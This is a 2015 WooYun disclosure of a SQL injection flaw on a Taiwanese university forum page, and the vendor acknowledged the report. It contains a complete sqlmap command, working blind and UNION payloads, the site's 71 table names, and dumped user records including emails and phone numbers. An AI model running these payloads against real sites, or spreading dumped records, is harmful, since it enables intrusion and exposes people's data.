当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148814

漏洞标题:台湾国立高雄应用科技大学某处存在SQL注入漏洞(71个表/大量用户信息泄露)(臺灣地區)

相关厂商:台湾国立高雄应用科技大学

漏洞作者: 路人甲

提交时间:2015-10-23 10:37

修复时间:2015-11-24 12:13

公开时间:2015-11-24 12:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经确认,细节仅向厂商公开
2015-11-03: 细节向核心白帽子及相关领域专家公开
2015-11-13: 细节向普通白帽子公开
2015-11-23: 细节向实习白帽子公开
2015-11-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

台湾国立高雄应用科技大学某处存在SQL注入漏洞(71个表/大量用户信息泄露)

详细说明:

地址:http://**.**.**.**/tw/ForumDetail.php?DSCDOCTYPID=0kzokc61n8lc4fj8&DSCDOCID=00c7od2x3fbmhaj8

python sqlmap.py -u "http://**.**.**.**/tw/ForumDetail.php?DSCDOCTYPID=0kzokc61n8lc4fj8&DSCDOCID=00c7od2x3fbmhaj8" -p DSCDOCTYPID --technique=BU --random-agent -D verckuas --tables

漏洞证明:

---
Parameter: DSCDOCTYPID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') AND 1560=1560 AND ('rAVK'='rAVK&DSCDOCID=00c7od2x3fbmhaj8
    Type: UNION query
    Title: MySQL UNION query (NULL) - 49 columns
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x7958426f567156416374,0x71627a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&DSCDOCID=00c7od2x3fbmhaj8
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
current user:    'verckuas@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'verckuas'@'localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DSCDOCTYPID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') AND 1560=1560 AND ('rAVK'='rAVK&DSCDOCID=00c7od2x3fbmhaj8
    Type: UNION query
    Title: MySQL UNION query (NULL) - 49 columns
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x7958426f567156416374,0x71627a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&DSCDOCID=00c7od2x3fbmhaj8
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
available databases [2]:
[*] information_schema
[*] verckuas
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DSCDOCTYPID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') AND 1560=1560 AND ('rAVK'='rAVK&DSCDOCID=00c7od2x3fbmhaj8
    Type: UNION query
    Title: MySQL UNION query (NULL) - 49 columns
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x7958426f567156416374,0x71627a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&DSCDOCID=00c7od2x3fbmhaj8
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
Database: verckuas
[71 tables]
+------------------+
| CHT_ADVIFO       |
| CHT_ADVIFOTYP    |
| CHT_ARWDOC       |
| CHT_ARWDOCTYP    |
| CHT_CMTDOC       |
| CHT_DSCDOC       |
| CHT_DSCDOCTYP    |
| CHT_QUSANSDOC    |
| CHT_QUSANSTYP    |
| CHT_QUSRSPDOC    |
| CHT_QUSRSPTYP    |
| CHT_REFDOC       |
| CHT_REFDOCTYP    |
| CHT_RT_ARWDOCTYP |
| CHT_RT_DSCDOCTYP |
| CHT_RT_QUSANSTYP |
| CHT_RT_QUSRSPTYP |
| CHT_RT_REFDOCTYP |
| COMIFO           |
| DELDCN           |
| DPTIFO           |
| ENG_ADVIFO       |
| ENG_ADVIFOTYP    |
| ENG_ARWDOC       |
| ENG_ARWDOCTYP    |
| ENG_CMTDOC       |
| ENG_DSCDOC       |
| ENG_DSCDOCTYP    |
| ENG_QUSANSDOC    |
| ENG_QUSANSTYP    |
| ENG_QUSRSPDOC    |
| ENG_QUSRSPTYP    |
| ENG_REFDOC       |
| ENG_REFDOCTYP    |
| ENG_RT_ARWDOCTYP |
| ENG_RT_DSCDOCTYP |
| ENG_RT_QUSANSTYP |
| ENG_RT_QUSRSPTYP |
| ENG_RT_REFDOCTYP |
| EPYIFO           |
| EPYIFOTYP        |
| EPYPSI           |
| MNUIFO           |
| PMSGRP           |
| PackTYP          |
| RT_DPTEPY        |
| RT_EPYIFOTYP     |
| RT_EPYMNU        |
| RT_MBRMNU        |
| RT_PMSGRPMNU     |
| VNM_ADVIFO       |
| VNM_ADVIFOTYP    |
| VNM_ARWDOC       |
| VNM_ARWDOCTYP    |
| VNM_CMTDOC       |
| VNM_DSCDOC       |
| VNM_DSCDOCTYP    |
| VNM_MBRIFO       |
| VNM_MBRIFOTYP    |
| VNM_QUSANSDOC    |
| VNM_QUSANSTYP    |
| VNM_QUSRSPDOC    |
| VNM_QUSRSPTYP    |
| VNM_REFDOC       |
| VNM_REFDOCTYP    |
| VNM_RT_ARWDOCTYP |
| VNM_RT_DSCDOCTYP |
| VNM_RT_MBRIFOTYP |
| VNM_RT_QUSANSTYP |
| VNM_RT_QUSRSPTYP |
| VNM_RT_REFDOCTYP |
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DSCDOCTYPID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') AND 1560=1560 AND ('rAVK'='rAVK&DSCDOCID=00c7od2x3fbmhaj8
    Type: UNION query
    Title: MySQL UNION query (NULL) - 49 columns
    Payload: DSCDOCTYPID=0kzokc61n8lc4fj8') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x7958426f567156416374,0x71627a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&DSCDOCID=00c7od2x3fbmhaj8
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
Database: verckuas
Table: CHT_ADVIFO
[13 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| ADVIFOID      | varchar(16)  |
| ADVIFOTYPID   | varchar(16)  |
| BriefTip      | varchar(50)  |
| EndDateTime   | datetime     |
| INTPICPath    | varchar(255) |
| ReadCNT       | int(6)       |
| RollingPeriod | int(2)       |
| RollingTYP    | varchar(4)   |
| SlottingSEQ   | int(10)      |
| StartDateTime | datetime     |
| StoreFilePath | varchar(255) |
| Subject       | varchar(100) |
| TargetPath    | varchar(255) |
+---------------+--------------+


<code>Database: verckuas
Table: CHT_QUSRSPDOC
[113 entries]
+----------+------------------+------------------+---------+-----------------------------------------+----------+---------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-------------+--------------+---------------------+----------------------+
| FL_Valid | QUSRSPTYPID | QUSRSPDOCID | AskTEL | AskEML | FL_Reply | AskSource | AskContent | AskDateTime | ReplySource | ReplyContent | ReplyDateTime | StoreFilePath |
+----------+------------------+------------------+---------+-----------------------------------------+----------+---------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-------------+--------------+---------------------+----------------------+
| 1 | 0kznz9m4lsdw2yf7 | 00bd2r7dmuscli0y | <blank> | cody@**.**.**.** | 0 | cody | test | 2010-04-27 11:28:46 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00bd2r7dmuscli0y |
| 1 | 0kznz9m4lsdw2yf7 | 00bf5ieol95lql6d | <blank> | bsa-Constantine7792@**.**.**.** | 0 | constantine | <blank> | 2010-07-11 12:17:57 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00bf5ieol95lql6d |
| 1 | 0kznz9m4lsdw2yf7 | 00bw3ho22asliaid | <blank> | frank.ko@**.**.**.** | 0 | test | test | 2012-03-12 17:23:33 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00bw3ho22asliaid |
| 1 | 0kznz9m4lsdw2yf7 | 00bw3e660mahrif4 | <blank> | frank.ko@**.**.**.** | 0 | test02 | test | 2012-03-12 17:27:05 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00bw3e660mahrif4 |
| 1 | 0kznz9m4lsdw2yf7 | 00bw32qpp11g8l7m | <blank> | frank.ko@**.**.**.** | 0 | test03 | test03 | 2012-03-12 17:30:43 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00bw32qpp11g8l7m |
| 1 | 0kznz9m4lsdw2yf7 | 00c1jol2p860xzfq | <blank> | [email protected] | 0 | Keyncdriede | Производим качественно, быстро и недорого <br />\r\nдвери ПВХ, Экошпон, металлические. <br />\r\nEmail:[email protected] <br />\r\nТел: 8-910-507-9595 | 2012-09-24 22:41:56 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1jol2p860xzfq |
| 1 | 0kznz9m4lsdw2yf7 | 00c1k1kkbv180lfe | <blank> | [email protected] | 0 | Keyncdriede | Производим качественно, быстро и недорого <br />\r\nдвери ПВХ, Экошпон, металлические. <br />\r\nEmail:[email protected] <br />\r\nТел: 8-910-507-9595 | 2012-09-25 00:14:22 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1k1kkbv180lfe |
| 1 | 0kznz9m4lsdw2yf7 | 00c1k1jl2thlm8us | <blank> | [email protected] | 0 | Keyncdriede | Производим качественно, быстро и недорого <br />\r\nдвери ПВХ, Экошпон, металлические. <br />\r\nEmail:[email protected] <br />\r\nТел: 8-910-507-9595 | 2012-09-25 00:54:30 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1k1jl2thlm8us |
| 1 | 0kznz9m4lsdw2yf7 | 00c1kgq82d91098f | <blank> | drubrideorm@**.**.**.** | 0 | Gusessitemile | Предлагаем услуги по доставке грузов из Европы в Россию на условиях DDP. <br />\r\nДоставка груза до склада клиента. <br />\r\n <br />\r\nEmail: [email protected] <br />\r\nhttp://www.eurocargo.fi | 2012-09-25 14:08:22 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1kgq82d91098f |
| 1 | 0kznz9m4lsdw2yf7 | 00c1k8y2gemfhy3w | <blank> | [email protected] | 0 | Ceabagete | Революционное изучение английского языка - Английский язык по-новому! <br />\r\n <br />\r\nХотите изучить английский язык быстро, в удобной форме, да еще при этом сэкономить свое время и деньги? Используйте возможность видеоконференции для обучения в виртуальном классе. <br />\r\nКаковы преимущества? <br />\r\n"Уроки проходят таким же образом, как и в классическом классе с "живым" учителем. <br />\r\n"Вы не должны никуда ехать, поэтому экономите своё время и деньги на проезд. <br />\r\n"Наши лекторы - это native speakri с многолетним опытом работы в обучении английскому языку. <br />\r\n"Привлекательные цены, которые значительно ниже цен "каменной" школы, скидки для пар - друзей, супругов и др., а также скидки за последующий курс или же целый левел. <br />\r\n"Обычная школа предлагает Вам только свидетельство об окончании курса. Мы же предлагаем Вам сертификат "CEFR", который Вы сможете применить в Европейском Союзе, а также в России стоимостью 3200 российских рублей, включена в цену левела. <br />\r\n"Широкая шкала курсов - классических, ускоренных, business english, разговорные курсы и др. <br />\r\n <br />\r\nОпробуйте для себя 4 обучающих урока бесплатно или же подключитесь к нам для проверки качества подключения и удостоверьтесь, что это самая удобная и одновременно самая эффективная форма обучения. <br />\r\n <br />\r\nКурсы начинаются с 30.9. 2012 года. <br />\r\n <br />\r\nЭкономьте свое время и деньги и в совершенстве овладевайте с нами английским языком! <br />\r\n <br />\r\nБолее подробную информацию по ценам, срокам обучения, видеоконференции и методиках обучения Вы найдете на страници <br />\r\n <br />\r\n http://www.instituteofeducation.eu/ru | 2012-09-25 15:27:16 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1k8y2gemfhy3w |
| 1 | 0kznz9m4lsdw2yf7 | 00c1kd01ga17j36r | <blank> | [email protected] | 0 | Ceabagete | Революционное изучение английского языка - Английский язык по-новому! <br />\r\n <br />\r\nХотите изучить английский язык быстро, в удобной форме, да еще при этом сэкономить свое время и деньги? Используйте возможность видеоконференции для обучения в виртуальном классе. <br />\r\nКаковы преимущества? <br />\r\n"Уроки проходят таким же образом, как и в классическом классе с "живым" учителем. <br />\r\n"Вы не должны никуда ехать, поэтому экономите своё время и деньги на проезд. <br />\r\n"Наши лекторы - это native speakri с многолетним опытом работы в обучении английскому языку. <br />\r\n"Привлекательные цены, которые значительно ниже цен "каменной" школы, скидки для пар - друзей, супругов и др., а также скидки за последующий курс или же целый левел. <br />\r\n"Обычная школа предлагает Вам только свидетельство об окончании курса. Мы же предлагаем Вам сертификат "CEFR", который Вы сможете применить в Европейском Союзе, а также в России стоимостью 3200 российских рублей, включена в цену левела. <br />\r\n"Широкая шкала курсов - классических, ускоренных, business english, разговорные курсы и др. <br />\r\n <br />\r\nОпробуйте для себя 4 обучающих урока бесплатно или же подключитесь к нам для проверки качества подключения и удостоверьтесь, что это самая удобная и одновременно самая эффективная форма обучения. <br />\r\n <br />\r\nКурсы начинаются с 30.9. 2012 года. <br />\r\n <br />\r\nЭкономьте свое время и деньги и в совершенстве овладевайте с нами английским языком! <br />\r\n <br />\r\nБолее подробную информацию по ценам, срокам обучения, видеоконференции и методиках обучения Вы найдете на страници <br />\r\n <br />\r\n http://www.instituteofeducation.eu/ru | 2012-09-25 15:35:06 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1kd01ga17j36r |
| 1 | 0kznz9m4lsdw2yf7 | 00c1kdw5h63atg4r | <blank> | [email protected] | 0 | Ceabagete | Революционное изучение английского языка - Английский язык по-новому! <br />\r\n <br />\r\nХотите изучить английский язык быстро, в удобной форме, да еще при этом сэкономить свое время и деньги? Используйте возможность видеоконференции для обучения в виртуальном классе. <br />\r\nКаковы преимущества? <br />\r\n"Уроки проходят таким же образом, как и в классическом классе с "живым" учителем. <br />\r\n"Вы не должны никуда ехать, поэтому экономите своё время и деньги на проезд. <br />\r\n"Наши лекторы - это native speakri с многолетним опытом работы в обучении английскому языку. <br />\r\n"Привлекательные цены, которые значительно ниже цен "каменной" школы, скидки для пар - друзей, супругов и др., а также скидки за последующий курс или же целый левел. <br />\r\n"Обычная школа предлагает Вам только свидетельство об окончании курса. Мы же предлагаем Вам сертификат "CEFR", который Вы сможете применить в Европейском Союзе, а также в России стоимостью 3200 российских рублей, включена в цену левела. <br />\r\n"Широкая шкала курсов - классических, ускоренных, business english, разговорные курсы и др. <br />\r\n <br />\r\nОпробуйте для себя 4 обучающих урока бесплатно или же подключитесь к нам для проверки качества подключения и удостоверьтесь, что это самая удобная и одновременно самая эффективная форма обучения. <br />\r\n <br />\r\nКурсы начинаются с 30.9. 2012 года. <br />\r\n <br />\r\nЭкономьте свое время и деньги и в совершенстве овладевайте с нами английским языком! <br />\r\n <br />\r\nБолее подробную информацию по ценам, срокам обучения, видеоконференции и методиках обучения Вы найдете на страници <br />\r\n <br />\r\n http://www.instituteofeducation.eu/ru | 2012-09-25 15:41:59 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1kdw5h63atg4r |
| 1 | 0kznz9m4lsdw2yf7 | 00c1kw9mb6mlxowr | <blank> | [email protected] | 0 | Ceabagete | Революционное изучение английского языка - Английский язык по-новому! <br />\r\n <br />\r\nХотите изучить английский язык быстро, в удобной форме, да еще при этом сэкономить свое время и деньги? Используйте возможность видеоконференции для обучения в виртуальном классе. <br />\r\nКаковы преимущества? <br />\r\n"Уроки проходят таким же образом, как и в классическом классе с "живым" учителем. <br />\r\n"Вы не должны никуда ехать, поэтому экономите своё время и деньги на проезд. <br />\r\n"Наши лекторы - это native speakri с многолетним опытом работы в обучении английскому языку. <br />\r\n"Привлекательные цены, которые значительно ниже цен "каменной" школы, скидки для пар - друзей, супругов и др., а также скидки за последующий курс или же целый левел. <br />\r\n"Обычная школа предлагает Вам только свидетельство об окончании курса. Мы же предлагаем Вам сертификат "CEFR", который Вы сможете применить в Европейском Союзе, а также в России стоимостью 3200 российских рублей, включена в цену левела. <br />\r\n"Широкая шкала курсов - классических, ускоренных, business english, разговорные курсы и др. <br />\r\n <br />\r\nОпробуйте для себя 4 обучающих урока бесплатно или же подключитесь к нам для проверки качества подключения и удостоверьтесь, что это самая удобная и одновременно самая эффективная форма обучения. <br />\r\n <br />\r\nКурсы начинаются с 30.9. 2012 года. <br />\r\n <br />\r\nЭкономьте свое время и деньги и в совершенстве овладевайте с нами английским языком! <br />\r\n <br />\r\nБолее подробную информацию по ценам, срокам обучения, видеоконференции и методиках обучения Вы найдете на страници <br />\r\n <br />\r\n http://www.instituteofeducation.eu/ru | 2012-09-25 15:44:03 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1kw9mb6mlxowr |
| 1 | 0kznz9m4lsdw2yf7 | 00c1m255godx9q9z | <blank> | dumclockbounk@**.**.**.** | 0 | enundedia | Соберем для Вас по сети интернет базу данных потенциальных клиентов <br />\r\nдля Вашего Бизнеса (все контактные данные) <br />\r\nСоберем Быстро! Много! Недорого! <br />\r\nУзнайте подробнее по тел +79133913837 <br />\r\nEmail: basedannix@**.**.**.** <br />\r\nICQ: 6288862 <br />\r\nSkype: s....8 | 2012-09-27 22:21:18 | <blank> | NULL | 0000-00-00 00:00:00 | QRD-00c1m255godx9q9z |
| 1 | 0kznz9m4lsdw2yf7 | 00c1uqjrk9l3lqc1 | <blank> | dumclockbounk@**.**.**.** | 0 | enundedia | Потенциальные клиенты много и сразу http://**.**.**.**.in/

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-24 15:44

厂商回复:

謝謝通報

最新状态:

2015-11-24:已無法查詢該網站